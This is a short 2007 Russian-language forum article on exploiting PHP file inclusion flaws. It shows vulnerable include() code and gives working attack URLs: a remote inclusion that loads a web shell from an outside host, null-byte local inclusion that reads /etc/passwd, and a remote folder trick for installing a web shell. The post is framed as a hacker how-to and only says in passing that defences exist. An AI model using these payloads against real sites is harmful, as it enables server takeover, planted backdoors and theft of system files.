Проведение php иньеций

Тема в разделе "Статьи", создана пользователем Constantine, 2 июн 2007.

  1. Constantine
    Constantine Guest
    Проведение php иньеций
    Пхп иньекция самая распространеная среди кретических уязвимостей после Sql иньекции

    Рассмотрим самый шоколадный вариант
    PHP:
    <?
    {
    какой то код}
    include(
    "$do.php")
    {
    какой то код}
    ?>
    По сути это грубейшая ошибка програмиста, многие встречались с линками такого вида:
    Код:
    http://somesite.ru/index.php?do=xaker
    Если при подстановки вместо значеня = xaker, значения =blablabla, мы получаем что нибудь типа:

    Код:
    Warning: main(blablabla.php): failed to open stream: No such file or directory in /home/user/www//page.php on line 3
    
    Warning: main(blablabla.php): failed to open stream: No such file or directory in /home/user/www/page.php on line 3
    
    Warning: main(): Failed opening 'blablabla.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/share/pear') in /home/user/www/page.php on line 3
    
    то уязвимость класса пхп иньекция обнаружена
    Пробуем подставить вместо blablabla ссылку на сайт с вебшелом
    http://realhaker.ru/evilshell
    Без расширения И вот он вебшелл

    Рассмотрим локальный инкулд

    PHP:
    <? 
    [
    кодъ] 
    Include (
    "files/$do.htm"); 
    [
    кодъ] 
    ?>
    Можно просмотреть файлы на сервере.
    Возможность просмотра файлов с расширением отличным от .htm нам дает старая, мало где встречающаяся бага с нулевым байтом
    Код:
    http://somesite.ru/index.php?do=../index.php%00
    http://somesite.ru/index.php?do=../../etc/passwd.htm нам так же неподходит ,ибо такого нет
    Код:
    http://somesite.ru/index.php?do=../../etc/passwd%00
    Этот тип иньекции по прежнему достаточно распространен

    Рассмотрим самый поганый случай

    PHP:
    <? 
    {
    кодъ} 
    Include (
    "$some/folder/do.php"); 
    {
    кодъ} 
    ?>
    Но все не так страшно как может показаться, на удаленном сервере мы организуем папку folger и do.php в ней
    Создаем и прописываем
    Код:
    http://somesite.ru/index.php?some=путь до шела
    вот он вебшелл

    Вообщем то существуют стандартные методы защиты от этой чумы, их легко найти в пабе
     
    Последнее редактирование модератором: 2 июн 2007
    2 июн 2007
    1 человеку нравится это.
  2. Constantine
    Constantine Guest
    10 сен 2007
Загрузка...